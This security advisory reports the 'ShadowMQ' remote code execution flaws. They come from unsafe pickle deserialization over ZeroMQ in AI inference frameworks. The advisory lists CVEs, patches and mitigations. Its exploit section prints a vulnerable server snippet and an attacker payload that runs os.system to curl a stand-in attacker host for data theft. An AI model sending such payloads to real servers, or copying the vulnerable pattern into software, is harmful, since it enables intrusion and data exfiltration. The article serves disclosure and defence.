"ShadowMQ" exploit pattern reported in major AI frameworks, enables remote code execution
Take action: AI tooling is still being developed in a rush, with insufficient security testing and heavy copy-paste reuse between frameworks, because the priority is getting to production fast rather than building a secure product. End users will likely suffer most. In general, be very conservative with AI frameworks: test thoroughly and patch quickly. For this particular issue, if you are using AI inference frameworks such as Meta Llama, vLLM, NVIDIA TensorRT-LLM, SGLang, or Modular Max Server, update to the latest patched versions immediately and make sure ZeroMQ sockets are not exposed to untrusted networks.
Learn More
Cybersecurity researchers from Oligo Security are reporting a widespread pattern of remote code execution vulnerabilities affecting major artificial intelligence inference engines from Meta, Nvidia, Microsoft, and open-source PyTorch projects including vLLM and SGLang.
The vulnerabilities, collectively termed "ShadowMQ," trace back to a common root cause: unsafe use of the ZeroMQ messaging library together with Python's pickle deserialization module. The flaw has propagated across multiple AI frameworks through code reuse and copy-paste practices, creating a cascade that exposes AI infrastructure processing sensitive prompts, model weights, and customer data on many systems reachable from the public internet.
The origin of the ShadowMQ pattern stems from a vulnerability in Meta's Llama large language model framework, tracked as CVE-2024-50050 (CVSS score 6.3 by Meta, Snyk scored it as 9.3).
The flaw is an insecure use of ZeroMQ's recv_pyobj() method to deserialize incoming data using Python's pickle module, which is inherently dangerous when processing untrusted data as it can execute arbitrary code during deserialization. The vulnerability was compounded by the framework exposing ZeroMQ sockets over the network without authentication, creating a scenario where attackers could achieve remote code execution by transmitting malicious serialized objects to vulnerable servers.
Meta patched this vulnerability in October 2024 by replacing the unsafe pickle serialization with a secure JSON-based implementation using Pydantic, and the pyzmq Python library also issued fixes with explicit warnings about using recv_pyobj with untrusted data.
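The shape of that fix can be sketched with the standard library alone (Pydantic adds schema validation on top of the same idea). This is a minimal illustration, not Meta's actual code; the `decode_request` name and the expected `"prompt"` field are assumptions.

```python
import json


def decode_request(raw):
    """Parse and validate a JSON message instead of calling recv_pyobj().

    JSON parsing cannot trigger code execution, unlike pickle, which
    invokes attacker-controlled callables during deserialization.
    """
    try:
        obj = json.loads(raw)
    except (ValueError, UnicodeDecodeError):
        return None  # reject malformed input
    # Reject anything that does not match the expected message shape
    if not isinstance(obj, dict) or not isinstance(obj.get("prompt"), str):
        return None
    return obj
```

On the server side, this replaces `socket.recv_pyobj()` with `decode_request(socket.recv())`: the raw bytes are parsed as data only, never executed.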
Oligo Security researchers identified that the same insecure deserialization pattern had been replicated across several other AI inference frameworks:
- CVE-2025-30165 (CVSS score 8.0) - vLLM framework (addressed by switching to V1 engine by default, though not completely fixed)
- CVE-2025-23254 (CVSS score 8.8) - NVIDIA TensorRT-LLM (fixed in version 0.18.2 with HMAC validation implementation)
- CVE-2025-60455 (CVSS score N/A) - Modular Max Server (patched using msgpack instead of pickle)
- Microsoft Sarathi-Serve research framework (remains unpatched)
- SGLang framework (implemented incomplete fixes despite maintainer acknowledgment)
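The HMAC-validation approach used in NVIDIA's fix can be sketched roughly as follows. This is an illustration of the general technique, not TensorRT-LLM's implementation; the key handling and function names are assumptions.

```python
import hashlib
import hmac

# Assumption: a shared secret distributed out of band to both endpoints
SECRET_KEY = b"shared-secret"


def sign(payload):
    """Prefix a payload with an HMAC-SHA256 authentication tag."""
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return tag + payload


def verify(message):
    """Return the payload only if its HMAC tag is valid, else None."""
    tag, payload = message[:32], message[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # drop forged or tampered messages before deserializing
    return payload
```

The point of the design is ordering: the tag is checked before any deserialization happens, so an attacker without the key cannot get a malicious payload anywhere near `pickle.loads()`.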
Exploit Example
Vulnerable Server Code:
```python
import zmq

context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")  # Exposed to the network without authentication

# Vulnerable: recv_pyobj() deserializes incoming data with pickle
data = socket.recv_pyobj()  # Attack happens here
process_request(data)
```

Attacker's Malicious Payload:
```python
import zmq


class Exploit:
    def __reduce__(self):
        import os
        # Arbitrary command execution during deserialization
        return (os.system, ("curl attacker.com/steal-data",))


# Send the malicious object to the vulnerable server
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://vulnerable-ai-server:5555")
socket.send_pyobj(Exploit())  # Serializes and sends the malicious object
```

What Happens:
- The server receives the malicious serialized object
- recv_pyobj() calls pickle.loads() to deserialize it
- Pickle automatically executes os.system() during deserialization
- The attacker's command runs with the server's privileges
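These steps can be reproduced safely in isolation without any network: pickle invokes whatever callable `__reduce__` returns, so a harmless `eval` stands in here for `os.system`.

```python
import pickle


class Demo:
    """Benign stand-in for the attacker's Exploit class."""

    def __reduce__(self):
        # An attacker would return (os.system, ("malicious command",));
        # a harmless eval shows that code runs during deserialization.
        return (eval, ("6 * 7",))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)  # evaluates "6 * 7" while deserializing
print(result)  # → 42
```

No method on `Demo` is ever called by the receiver; merely loading the bytes is enough, which is why pickle must never be used on untrusted input.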
The vulnerable files in SGLang explicitly stated they were "adapted by vLLM," while Modular Max Server borrowed identical logic from both vLLM and SGLang, effectively perpetuating the same critical flaw across multiple codebases maintained by different organizations.
SGLang's adoption by major technology companies including xAI, AMD, Nvidia, Intel, LinkedIn, Cursor, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, and prominent universities amplifies the potential impact of the unpatched vulnerabilities.
Security researcher Avi Lumelsky emphasized that while AI projects are advancing at unprecedented speed and commonly borrow architectural components from peer frameworks, when code reuse inadvertently includes unsafe patterns, the security consequences propagate rapidly across the ecosystem.
Organizations are strongly advised to update affected frameworks to patched versions immediately, restrict network exposure of ZeroMQ sockets, and review any use of pickle deserialization in their own code and dependencies.
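As a starting point for that review, a simple audit helper can flag the risky calls in source text; the function name and regular expression below are illustrative, not an exhaustive detector.

```python
import re

# Flag recv_pyobj() and pickle.load()/pickle.loads() call sites
RISKY = re.compile(r"recv_pyobj\s*\(|pickle\.loads?\s*\(")


def audit_source(source):
    """Return (line_number, line) pairs containing risky deserialization calls."""
    return [
        (lineno, line.strip())
        for lineno, line in enumerate(source.splitlines(), 1)
        if RISKY.search(line)
    ]
```

Running it over a codebase (file by file) surfaces each `recv_pyobj` or `pickle.loads` call site for manual review; hits are not automatically exploitable, but each one deserves scrutiny.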